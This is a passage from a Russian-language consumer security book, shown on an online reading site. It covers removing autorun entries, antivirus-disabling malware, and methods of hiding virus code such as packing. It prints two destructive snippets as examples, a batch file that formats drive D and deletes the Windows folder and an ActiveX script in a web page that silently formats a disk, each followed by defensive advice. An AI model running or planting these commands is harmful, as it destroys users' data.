Π§ΠΈΡ‚Π°ΠΉΡ‚Π΅ ΠΊΠ½ΠΈΠ³ΠΈ ΠΎΠ½Π»Π°ΠΉΠ½ Π½Π° Bookidrom.ru! БСсплатныС ΠΊΠ½ΠΈΠ³ΠΈ Π² ΠΎΠ΄Π½ΠΎΠΌ ΠΊΠ»ΠΈΠΊΠ΅

Π§ΠΈΡ‚Π°Ρ‚ΡŒ ΠΎΠ½Π»Π°ΠΉΠ½ Β«Π—Π°Ρ‰ΠΈΡ‚ΠΈ свой ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€ Π½Π° 100% ΠΎΡ‚ вирусов ΠΈ Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²Β». Π‘Ρ‚Ρ€Π°Π½ΠΈΡ†Π° 33

Автор ОлСг Π‘ΠΎΠΉΡ†Π΅Π²

Π’Ρ‹ΡˆΠ΅ΠΏΠ΅Ρ€Π΅Ρ‡ΠΈΡΠ»Π΅Π½Π½Ρ‹Π΅ Π²Π΅Ρ‚ΠΊΠΈ рССстра ΠΌΠΎΠΆΠ½ΠΎ ΡΡ‡ΠΈΡ‚Π°Ρ‚ΡŒ самыми распространСнными путями запуска, ΠΎΠ΄Π½Π°ΠΊΠΎ эти записи ΡΠΎΡΡ‚Π°Π²Π»ΡΡŽΡ‚ Π΄Π°Π»Π΅ΠΊΠΎ Π½Π΅ ΠΈΡΡ‡Π΅Ρ€ΠΏΡ‹Π²Π°ΡŽΡ‰ΠΈΠΉ список.

Π£Π΄Π°Π»ΠΈΡ‚ΡŒ запись, ΠΏΡ€ΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°Ρ‰ΡƒΡŽ Π½Π΅ΠΏΡ€ΠΎΡˆΠ΅Π½ΠΎΠΌΡƒ Π³ΠΎΡΡ‚ΡŽ, ΠΌΠΎΠΆΠ½ΠΎ, запустив Ρ€Π΅Π΄Π°ΠΊΡ‚ΠΎΡ€ рССстра (ΠΎΡ‚ΠΊΡ€ΠΎΠΉΡ‚Π΅ мСню ΠŸΡƒΡΠΊ, Ρ‰Π΅Π»ΠΊΠ½ΠΈΡ‚Π΅ Π½Π° ссылкС Π’Ρ‹ΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ ΠΈ Π² появившСмся ΠΎΠΊΠ½Π΅ Π²Π²Π΅Π΄ΠΈΡ‚Π΅ ΠΊΠΎΠΌΠ°Π½Π΄Ρƒ regedit) ΠΈΠ»ΠΈ ΠΆΠ΅ воспользовавшись спСциализированными ΡƒΡ‚ΠΈΠ»ΠΈΡ‚Π°ΠΌΠΈ Ρ‚ΠΈΠΏΠ° Starter (рис. 4.9).

Рис. 4.9. Π£Ρ‚ΠΈΠ»ΠΈΡ‚Π° Starter Π² дСйствии

И напослСдок ΠΎΠ΄ΠΈΠ½ ΠΈΠ· ΠΏΡ€ΠΈΠΌΠ΅Ρ€ΠΎΠ² излСчСния систСмы ΠΎΡ‚ вируса, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ ΠΏΡ€ΠΈ своСй Ρ€Π°Π±ΠΎΡ‚Π΅ просто-напросто ΠΎΡ‚ΠΊΠ»ΡŽΡ‡Π°Π» "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 7.0", Nod32, Dr.Web ΠΈ Π΄Ρ€ΡƒΠ³ΠΎΠ΅ антивирусноС ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠ΅ обСспСчСниС. Вирус присутствовал Π² Π±Π°Π·Π°Ρ… пСрСчислСнных антивирусов, Π½ΠΎ ΠΎΡ‚ΠΊΠ»ΡŽΡ‡Π°Π» ΠΈΡ… ΠΏΡ€Π΅ΠΆΠ΄Π΅, Ρ‡Π΅ΠΌ ΠΎΠ½ΠΈ ΠΏΡ‹Ρ‚Π°Π»ΠΈΡΡŒ ΡƒΠ΄Π°Π»ΠΈΡ‚ΡŒ Π΅Π³ΠΎ.

Π’Ρ‹Ρ…ΠΎΠ΄ оказался достаточно простым: Π² Π΄Π°Π½Π½ΠΎΠΌ случаС эффСктивным срСдством ΠΏΡ€ΠΎΡ‚ΠΈΠ² ΡƒΠΏΡ€Π΅ΠΆΠ΄Π°ΡŽΡ‰Π΅ΠΉ дСструктивной Π΄Π΅ΡΡ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΠΈ Ρ‚Π°ΠΊΠΎΠ³ΠΎ вируса оказалась Π·Π°Π³Ρ€ΡƒΠ·ΠΊΠ° систСмы ΠΈΠ·-ΠΏΠΎΠ΄ ΡƒΡ‡Π΅Ρ‚Π½ΠΎΠΉ записи с ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΡΠΊΠΈΠΌΠΈ привилСгиями (Π΄ΠΎ этого ΠΌΠΎΠΌΠ΅Π½Ρ‚Π° систСму Π·Π°Π³Ρ€ΡƒΠΆΠ°Π»ΠΈ ΠΈΠ·-ΠΏΠΎΠ΄ ΠΏΡ€Π°Π² администратора, ΠΈ вирус, соотвСтствСнно, ΠΈΠΌΠ΅Π» практичСски Π½Π΅ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡Π΅Π½Π½Ρ‹Π΅ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ, Π² Ρ‚ΠΎΠΌ числС ΠΈ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ управлСния антивирусным ПО).

Π’ связи с этим умСстно ΡƒΠΏΠΎΠΌΡΠ½ΡƒΡ‚ΡŒ ΠΎΠ΄Π½ΠΎ ΠΈΠ· Π³Π»Π°Π²Π½Ρ‹Ρ… ΠΏΡ€Π°Π²ΠΈΠ» антивирусной бСзопасности: вирусный ΠΊΠΎΠ΄ ΠΌΠΎΠΆΠ΅Ρ‚ всС Ρ‚ΠΎ, Ρ‡Ρ‚ΠΎ ΠΌΠΎΠΆΠ΅Ρ‚ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ.

Π’Ρ‹Π²ΠΎΠ΄: Ρ€Π°Π±ΠΎΡ‚Π° с ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΡΠΊΠΈΠΌΠΈ ΠΏΡ€Π°Π²Π°ΠΌΠΈ Π² систСмС Π·Π½Π°Ρ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ сниТаСт ΠΊΠ°ΠΊ риск зараТСния, Ρ‚Π°ΠΊ ΠΈ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½Ρ‹Π΅ дСструктивныС послСдствия запуска врСдоносного ΠΊΠΎΠ΄Π°.

Π“Π»Π°Π²Π° 5

АгрСссивныС Ρ„ΠΎΡ€ΠΌΡ‹ ΠΊΠΎΠ΄Π° ΠΈ Π±ΠΎΡ€ΡŒΠ±Π° с Π½ΠΈΠΌΠΈ

♦ ВсС гСниальноС – просто. ПишСм вирус ΠΎΠ΄Π½ΠΎΠΉ строкой!

♦ Π’Π΅Π±-страница Π² ΠΎΠ±Π»ΠΈΡ‡ΠΈΠΈ Π€Ρ€Π΅Π΄Π΄ΠΈ ΠšΡ€ΡŽΠ³Π΅Ρ€Π° – "ΠΏΠΎΡ‚Ρ€ΠΎΡˆΠΈΡ‚" ваш винчСстСр!

♦ Антология сокрытия вирусного ΠΊΠΎΠ΄Π°

♦ Как Ρ€Π°Π±ΠΎΡ‚Π°Π΅Ρ‚ эвристичСский Π°Π½Π°Π»ΠΈΠ·Π°Ρ‚ΠΎΡ€ ΠΊΠΎΠ΄Π° ΠΈ ΠΏΠΎΡ‡Π΅ΠΌΡƒ Π΄Π°ΠΆΠ΅ Π΄Π²Π° антивируса Π² систСмС ΠΌΠΎΠ³ΡƒΡ‚ ΡΡ‚Π°Ρ‚ΡŒ бСсполСзными

Как ΠΎΠ±ΠΎΠΉΡ‚ΠΈ антивирус? МоТно Π»ΠΈ Π½Π°ΠΏΠΈΡΠ°Ρ‚ΡŒ вирус всСго ΠΎΠ΄Π½ΠΎΠΉ строкой ΠΊΠΎΠ΄Π°? ΠœΠΎΠΆΠ΅Ρ‚ Π»ΠΈ Π²Π΅Π±-страница ΠΎΡ‚Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ диск? КакиС ΠΌΠ΅Ρ‚ΠΎΠ΄Ρ‹ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ вирусописатСли для сокрытия своСго ΠΊΠΎΠ΄Π° ΠΈ ΠΏΠΎΡ‡Π΅ΠΌΡƒ Π΄Π°ΠΆΠ΅ Π΄Π²Π° антивируса ΠΌΠΎΠ³ΡƒΡ‚ ΡΡ‚Π°Ρ‚ΡŒ бСсполСзными для вашСй систСмы?

На эти вопросы Π²Ρ‹ Π½Π°ΠΉΠ΄Π΅Ρ‚Π΅ ΠΎΡ‚Π²Π΅Ρ‚Ρ‹ Π² Π΄Π°Π½Π½ΠΎΠΉ Π³Π»Π°Π²Π΅.

5.1. ВсС гСниальноС – просто. ПишСм вирус ΠΎΠ΄Π½ΠΎΠΉ строкой!

МоТно Π»ΠΈ ΡΠΎΠ·Π΄Π°Ρ‚ΡŒ вирус, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π½Π΅ Π±ΡƒΠ΄Π΅Ρ‚ ΡΠ²Π΅Ρ‚ΠΈΡ‚ΡŒΡΡ Π² Π±Π°Π·Π°Ρ… антивирусов? МоТно. И Ρ‡Ρ‚ΠΎΠ±Ρ‹ этот вирус Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ΠΈΡ€ΠΎΠ²Π°Π» диски ΠΈ Β«ΡƒΠ±ΠΈΠ²Π°Π»Β» Windows? МоТно. ΠŸΠ°Ρ€ΠΎΠΉ строчСк? МоТно! Волько Π½ΠΈΠΊΠΎΠΌΡƒ (листинг 5.1)…

Листинг 5.1. ВсСго Π΄Π²Π΅ строки

@echo off

format d:/q/y & del %SystemRoot% /q/s/f

Π’ΠΎΠ·ΠΌΠΎΠΆΠ½Ρ‹Π΅ Π²Π°Ρ€ΠΈΠ°Π½Ρ‚Ρ‹ Π·Π°Ρ‰ΠΈΡ‚Ρ‹ ΠΎΡ‚ Ρ‚Π°ΠΊΠΎΠ³ΠΎ "ΡΡŽΡ€ΠΏΡ€ΠΈΠ·Π°":

♦ Π±Π΄ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ (вСдь Π΄Π°Π½Π½Ρ‹ΠΉ ΠΏΡ€ΠΈΠΌΠ΅Ρ€ – скрипт-вирус, ΠΊΠΎΠ΄ ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ³ΠΎ ΠΌΠΎΠΆΠ½ΠΎ ΠΏΡ€ΠΎΡΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ‡Π΅Ρ€Π΅Π· Π‘Π»ΠΎΠΊΠ½ΠΎΡ‚!);

♦ Ρ€Π°Π±ΠΎΡ‚Π° Π½Π΅ с ΠΏΡ€Π°Π²Π°ΠΌΠΈ администратора (ΠΏΠΎΠΏΡ€ΠΎΠ±ΡƒΠΉΡ‚Π΅ ΠΎΡ‚Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ диск с ΠΏΡ€Π°Π²Π°ΠΌΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ!).

5.2. Π’Π΅Π±-страница Π² ΠΎΠ±Π»ΠΈΡ‡ΠΈΠΈ Π€Ρ€Π΅Π΄Π΄ΠΈ ΠšΡ€ΡŽΠ³Π΅Ρ€Π° – Β«ΠΏΠΎΡ‚Ρ€ΠΎΡˆΠΈΡ‚Β» ваш винчСстСр!

МоТно Π»ΠΈ, посСтив сайт, ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ Π² ΠΏΠΎΠ΄Π°Ρ€ΠΎΠΊ ΠΎΡ‚Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹Π΅ диски? А ΠΏΠΎΡ‡Π΅ΠΌΡƒ Π±Ρ‹ ΠΈ Π½Π΅Ρ‚. Π’Π΅ΠΌ Π±ΠΎΠ»Π΅Π΅ Ρ‡Ρ‚ΠΎ возмоТности JavaScript ΠΈ ActiveX Π²ΠΊΡƒΠΏΠ΅ с многочислСнными уязвимостями Internet Explorer выходят Π·Π° Ρ€Π°ΠΌΠΊΠΈ простых Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹Ρ… Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΉ (листинг 5.2).

Листинг 5.2. Π€ΠΎΡ€ΠΌΠ°Ρ‚ΠΈΡ€ΡƒΠ΅ΠΌ диск – Π»Π΅Π³ΠΊΠΎ!

<script>

a=new ActiveXObject("WScript.Shell");

a.run("cmd /c format d:/y",0);

</script>

ΠŸΡ€ΠΈΠΌΠ΅Π½Π΅Π½ΠΈΠ΅ ActiveX-ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚ΠΎΠ² Π΄Π΅Π»Π°Π΅Ρ‚ Π²Π΅Π±-страницы Π±ΠΎΠ»Π΅Π΅ ΠΈΠ½Ρ‚Π΅Ρ€Π°ΠΊΡ‚ΠΈΠ²Π½Ρ‹ΠΌΠΈ. Но Π·Π° удобство ΠΈ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½Π°Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ ΠΌΠΎΠΆΠ½ΠΎ Π΄ΠΎΡ€ΠΎΠ³ΠΎ Π·Π°ΠΏΠ»Π°Ρ‚ΠΈΡ‚ΡŒ: многочислСнныС уязвимости IE ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡŽΡ‚, ΠΊ ΠΏΡ€ΠΈΠΌΠ΅Ρ€Ρƒ, нСподписанныС (ΠΎΠ½ΠΈ ΠΆΠ΅ нСбСзопасныС) ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚Ρ‹ ActiveX ΠΏΡ€Π΅Π΄ΡΡ‚Π°Π²ΠΈΡ‚ΡŒ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŽ ΠΊΠ°ΠΊ подписанныС (бСзопасныС, Ρ‚Π°ΠΊ ΠΊΠ°ΠΊ происхоТдСниС ΠΈ содСрТаниС Ρ‚Π°ΠΊΠΎΠ³ΠΎ ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚Π° ΠΏΠΎΠ΄Ρ‚Π²Π΅Ρ€ΠΆΠ΄Π΅Π½ΠΎ элСктронной подписью ΡƒΠ΄ΠΎΡΡ‚ΠΎΠ²Π΅Ρ€ΡΡŽΡ‰Π΅Π³ΠΎ Ρ†Π΅Π½Ρ‚Ρ€Π°) ΠΈΠ»ΠΈ Π²ΠΎΠΎΠ±Ρ‰Π΅ ΡΠΊΡ€Ρ‹Ρ‚ΡŒ ΠΎΡ‚ Π³Π»Π°Π· Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½ΠΎΠ³ΠΎ сцСнария.

Π’ΠΎΠ·ΠΌΠΎΠΆΠ½Ρ‹Π΅ Π²Π°Ρ€ΠΈΠ°Π½Ρ‚Ρ‹ Π·Π°Ρ‰ΠΈΡ‚Ρ‹ Π² ΠΏΠΎΠ΄ΠΎΠ±Π½Ρ‹Ρ… случаях.

♦ Π—Π°Π΄Π°Π½ΠΈΠ΅ бСзопасных настроСк Π±Ρ€Π°ΡƒΠ·Π΅Ρ€Π° (БСрвис β–Ί Бвойства обозрСватСля β–Ί Π‘Π΅Π·ΠΎΠΏΠ°ΡΠ½ΠΎΡΡ‚ΡŒ β–Ί Высокий).

♦ Как Π°Π»ΡŒΡ‚Π΅Ρ€Π½Π°Ρ‚ΠΈΠ²Π°, ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€ΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ Π·ΠΎΠ½ ΠΈΠ½Ρ‚Π΅Ρ€Π½Π΅Ρ‚-бСзопасности Π²Ρ€ΡƒΡ‡Π½ΡƒΡŽ (БСрвис β–Ί Бвойства обозрСватСля β–Ί Π‘Π΅Π·ΠΎΠΏΠ°ΡΠ½ΠΎΡΡ‚ΡŒ β–Ί Π”Ρ€ΡƒΠ³ΠΎΠΉ β–Ί Π—Π°Π³Ρ€ΡƒΠ·ΠΊΠ° нСподписанных элСмСнтов ActiveX β–Ί ΠžΡ‚ΠΊΠ»ΡŽΡ‡ΠΈΡ‚ΡŒ, АктивныС сцСнарии β–Ί ΠžΡ‚ΠΊΠ»ΡŽΡ‡ΠΈΡ‚ΡŒ ΠΈ Ρ‚. Π΄.).

♦ Ну ΠΈ, ΠΊΠΎΠ½Π΅Ρ‡Π½ΠΎ ΠΆΠ΅, Π±Π΄ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ. К ΠΏΡ€ΠΈΠΌΠ΅Ρ€Ρƒ, ΠΏΡ€Π΅ΠΆΠ΄Π΅ Ρ‡Π΅ΠΌ Π²Ρ‹ΡˆΠ΅ΠΎΠΏΠΈΡΠ°Π½Π½Ρ‹ΠΉ сцСнарий сдСлаСт своС Ρ‡Π΅Ρ€Π½ΠΎΠ΅ Π΄Π΅Π»ΠΎ, систСма Π΄Π²Π° Ρ€Π°Π·Π° "Π°ΠΊΠΊΡƒΡ€Π°Ρ‚Π½ΠΎ Π½Π°ΠΌΠ΅ΠΊΠ½Π΅Ρ‚" Π½Π° ΠΏΠΎΡ‚Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½ΡƒΡŽ ΠΎΠΏΠ°ΡΠ½ΠΎΡΡ‚ΡŒ (рис. 5.1 ΠΈ 5.2).

Рис. 5.1. ΠŸΠ΅Ρ€Π²ΠΎΠ΅ ΠΏΡ€Π΅Π΄ΡƒΠΏΡ€Π΅ΠΆΠ΄Π΅Π½ΠΈΠ΅

Рис. 5.2. Π’Ρ‚ΠΎΡ€ΠΎΠ΅ ΠΏΡ€Π΅Π΄ΡƒΠΏΡ€Π΅ΠΆΠ΄Π΅Π½ΠΈΠ΅

5.3. Антология сокрытия вирусного ΠΊΠΎΠ΄Π°

НС сСкрСт, Ρ‡Ρ‚ΠΎ Π²Ρ‹ΠΆΠΈΠ²Π°Π΅ΠΌΠΎΡΡ‚ΡŒ соврСмСнного врСдоносного ПО Π² большСй стСпСни обусловлСна Π΅Π³ΠΎ ΠΏΠ°Ρ€Π°Π»Π»Π΅Π»ΡŒΠ½ΠΎΠΉ ΡΠ²ΠΎΠ»ΡŽΡ†ΠΈΠ΅ΠΉ с антивирусными ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚Π°ΠΌΠΈ. Π‘ΠΎΠ²Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹ΠΉ антивирус ΡƒΠΆΠ΅ Π½Π΅ Ρ‚ΠΎΡ‚, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π±Ρ‹Π» Π³ΠΎΠ΄-Π΄Π²Π° Ρ‚ΠΎΠΌΡƒ Π½Π°Π·Π°Π΄, β€“ это Ρ„Π°ΠΊΡ‚. Для ΠΎΡ‚Π»ΠΎΠ²Π° ΠΈ уничтоТСния врСдоносного ΠΊΠΎΠ΄Π° Π² антивирусах Ρ€Π΅Π°Π»ΠΈΠ·ΠΎΠ²Π°Π½Ρ‹ самыС ΠΏΠ΅Ρ€Π΅Π΄ΠΎΠ²Ρ‹Π΅ ΠΈ ΠΈΠ·ΠΎΡ‰Ρ€Π΅Π½Π½Ρ‹Π΅ Ρ‚Π΅Ρ…Π½ΠΎΠ»ΠΎΠ³ΠΈΠΈ: ΠΌΠΎΠ΄ΡƒΠ»ΠΈ ΠΏΡ€ΠΎΠ°ΠΊΡ‚ΠΈΠ²Π½ΠΎΠΉ Π·Π°Ρ‰ΠΈΡ‚Ρ‹ ΠΈ Π°Π½Π°Π»ΠΈΠ·Π° ΠΏΠΎΠ΄ΠΎΠ·Ρ€ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΠ³ΠΎ повСдСния, ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒ цСлостности ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠΉ ΠΈ рССстра ΠΈ Π΄Ρ€. Π‘Ρ‚ΠΎΠΈΡ‚ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ‚Π°ΠΊΠΎΠΌΡƒ Β«Π·Π²Π΅Ρ€ΡŽΒ» ΠΏΠΎΠΊΠ°Π·Π°Ρ‚ΡŒ сСбя, ΠΊΠ°ΠΊ Π΅Π³ΠΎ Ρ‚ΡƒΡ‚ ΠΆΠ΅ пропустят Ρ‡Π΅Ρ€Π΅Π· «мясорубку», Π² Ρ€ΠΎΠ»ΠΈ ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ, ΠΊΠ°ΠΊ Π²Ρ‹ ΡƒΠΆΠ΅ догадались, выступаСт антивирусный сканСр, послС Ρ‡Π΅Π³ΠΎ ΠΏΠΎΠ΄ΠΎΠ·Ρ€ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ остатки окаТутся Β«Π½Π° ΠΏΡ€ΠΈΠ΅ΠΌΠ΅Β» Ρƒ эвристичСского Π°Π½Π°Π»ΠΈΠ·Π°Ρ‚ΠΎΡ€Π°.

Ну Π΄Π°, казалось Π±Ρ‹, послС Ρ‚Π°ΠΊΠΎΠ³ΠΎ чистилища ΠΊΠ°ΠΊΠΎΠΉ ΠΈΠ· экзСмпляров вирусного ΠΊΠΎΠ΄Π° выстоит? Но Π½Π΅Ρ‚. ВсС ΠΆΠ΅ Ρ„Π°ΠΊΡ‚ остаСтся Ρ„Π°ΠΊΡ‚ΠΎΠΌ: Π΅ΠΆΠ΅Π΄Π½Π΅Π²Π½ΠΎ рСгистрируСтся появлСниС Π±ΠΎΠ»Π΅Π΅ сотни экзСмпляров вирусного ΠΊΠΎΠ΄Π°, ΠΈ ΠΊΠ°ΠΆΠ΄Ρ‹ΠΉ ΠΈΠ· экзСмпляров Ρ€ΠΎΠΆΠ΄Π΅Π½, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΎΡΡ‚Π°Ρ‚ΡŒΡΡ Π½Π΅Π²ΠΈΠ΄ΠΈΠΌΠΊΠΎΠΉ.

На сСгодняшний дСнь ΠΌΠΎΠΆΠ½ΠΎ Π²Ρ‹Π΄Π΅Π»ΠΈΡ‚ΡŒ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠ΅ Π½Π°ΠΈΠ±ΠΎΠ»Π΅Π΅ популярныС ΠΌΠ΅Ρ‚ΠΎΠ΄Ρ‹ сокрытия:

♦ ΡƒΠΏΠ°ΠΊΠΎΠ²ΠΊΠ°;

♦ ΠΏΠΎΠ»ΠΈΠΌΠΎΡ€Ρ„ΠΈΠ·ΠΌ;

♦ обфускация;

♦ Ρ€ΡƒΡ‚ΠΊΠΈΡ‚-Ρ‚Π΅Ρ…Π½ΠΎΠ»ΠΎΠ³ΠΈΠΈ;

♦ сокрытиС Π² срСдС.

Π”Π°ΠΆΠ΅ этого, Π΄Π°Π»Π΅ΠΊΠΎ Π½Π΅ ΠΏΠΎΠ»Π½ΠΎΠ³ΠΎ списка достаточно, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΏΡ€Π΅Π΄ΡΡ‚Π°Π²ΠΈΡ‚ΡŒ сСбС, насколько Ρ‚Π΅Ρ…Π½ΠΎΠ»ΠΎΠ³ΠΈΡ‡Π½Ρ‹ соврСмСнныС ΠΌΠ΅Ρ‚ΠΎΠ΄Ρ‹ сокрытия вирусного ΠΊΠΎΠ΄Π°.

Π£ΠΏΠ°ΠΊΠΎΠ²ΠΊΠ°

НачнСм с ΡƒΠΏΠ°ΠΊΠΎΠ²ΠΊΠΈ ΠΊΠ°ΠΊ самого популярного ΠΌΠ΅Ρ‚ΠΎΠ΄Π° сокрытия вирусного ΠΊΠΎΠ΄Π°. К слову Π±ΡƒΠ΄Π΅Ρ‚ сказано, ΠΈΠΌΠ΅Π½Π½ΠΎ ΡƒΠΏΠ°ΠΊΠΎΠ²ΠΊΠ° являСтся самым простым инструмСнтом, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΡΠΊΡ€Ρ‹Ρ‚ΡŒ вирус, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ ΡƒΠΆΠ΅ засвСтился Π² антивирусных Π±Π°Π·Π°Ρ….

Π£ΠΏΠ°ΠΊΠΎΠ²ΠΊΠ° Π·Π°ΠΊΠ»ΡŽΡ‡Π°Π΅Ρ‚ΡΡ Π² сТатии исполняСмого Ρ„Π°ΠΉΠ»Π° ΠΈ ΠΏΡ€ΠΈΠΊΡ€Π΅ΠΏΠ»Π΅Π½ΠΈΠΈ ΠΊ Π½Π΅ΠΌΡƒ ΠΊΠΎΠ΄Π°, Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΠΎΠ³ΠΎ для распаковки ΠΈ исполнСния.

Как ΠΌΠ΅Ρ‚ΠΎΠ΄ сокрытия ΡƒΠΏΠ°ΠΊΠΎΠ²ΠΊΠ° прСдставляСт собой довольно Π³Ρ€ΠΎΠ·Π½ΠΎΠ΅ ΠΎΡ€ΡƒΠΆΠΈΠ΅. Достаточно привСсти ΠΏΡ€ΠΈΠΌΠ΅Ρ€: Π³Ρ€Π°ΠΌΠΎΡ‚Π½ΠΎ ΡƒΠΏΠ°ΠΊΠΎΠ²Π°Π½Π½Ρ‹ΠΉ Ρ‡Π΅Ρ€Π²ΡŒ способСн Π²Ρ‹Π·Π²Π°Ρ‚ΡŒ Π½Π΅ ΠΌΠ΅Π½Π΅Π΅ ΡΠ΅Ρ€ΡŒΠ΅Π·Π½ΡƒΡŽ, Ρ‡Π΅ΠΌ Π΅Π³ΠΎ ΠΏΠ΅Ρ€Π²ΠΎΠΎΠ±Ρ€Π°Π·, эпидСмию, вСдь Ρ‚Π°ΠΊΠΎΠΉ Ρ‡Π΅Ρ€Π²ΡŒ распознаСтся антивирусами ΠΊΠ°ΠΊ Π½ΠΎΠ²Ρ‹ΠΉ экзСмпляр. НС сСкрСт, Ρ‡Ρ‚ΠΎ Π±ΠΎΠ»ΡŒΡˆΠΈΠ½ΡΡ‚Π²ΠΎ ΠΈΠ· Π½Ρ‹Π½Π΅ ΠΏΡ€ΠΈΡΡƒΡ‚ΡΡ‚Π²ΡƒΡŽΡ‰ΠΈΡ… Π² сСти врСдоносных ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ Π΅ΡΡ‚ΡŒ Π½Π΅ Ρ‡Ρ‚ΠΎ ΠΈΠ½ΠΎΠ΅, ΠΊΠ°ΠΊ ΠΌΠΎΠ΄ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ посрСдством ΡƒΠΏΠ°ΠΊΠΎΠ²ΠΊΠΈ. НапримСр, ΡˆΠΈΡ€ΠΎΠΊΠΎ извСстный троянский конь Backdoor.Rbot распространяСтся ΡƒΠΏΠ°ΠΊΠΎΠ²Π°Π½Π½Ρ‹ΠΌ мноТСством Ρ€Π°Π·Π»ΠΈΡ‡Π½Ρ‹Ρ… ΡƒΠΏΠ°ΠΊΠΎΠ²Ρ‰ΠΈΠΊΠΎΠ² (Ezip, Exe32Pack, ExeStealth, PecBundle, PECompact, FSG, UPX, Morphine, ASPack, Petite, PE-Pack, PE-Diminisher, PELock, PESpin, TeLock, Molebox, Yoda, Ezip, Krypton ΠΈ Π΄Ρ€.).

Когда антивирусу попадаСтся ΡƒΠΏΠ°ΠΊΠΎΠ²Π°Π½Π½Ρ‹ΠΉ Ρ„Π°ΠΉΠ», ΠΎΠ½ Π΅Π³ΠΎ, понятноС Π΄Π΅Π»ΠΎ, пытаСтся Ρ€Π°ΡΠΏΠ°ΠΊΠΎΠ²Π°Ρ‚ΡŒ. ΠŸΠΎΠ»ΡƒΡ‡Π°Π΅Ρ‚ΡΡ, Ρ‡Ρ‚ΠΎ Ρ‡Π΅ΠΌ с большим количСством ΡƒΠΏΠ°ΠΊΠΎΠ²Ρ‰ΠΈΠΊΠΎΠ² способСн Ρ€Π°Π±ΠΎΡ‚Π°Ρ‚ΡŒ антивирус, Ρ‚Π΅ΠΌ большС Ρƒ Π½Π΅Π³ΠΎ шансов ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ ΡƒΠΏΠ°ΠΊΠΎΠ²Π°Π½Π½Ρ‹ΠΉ ΠΊΠΎΠ΄.

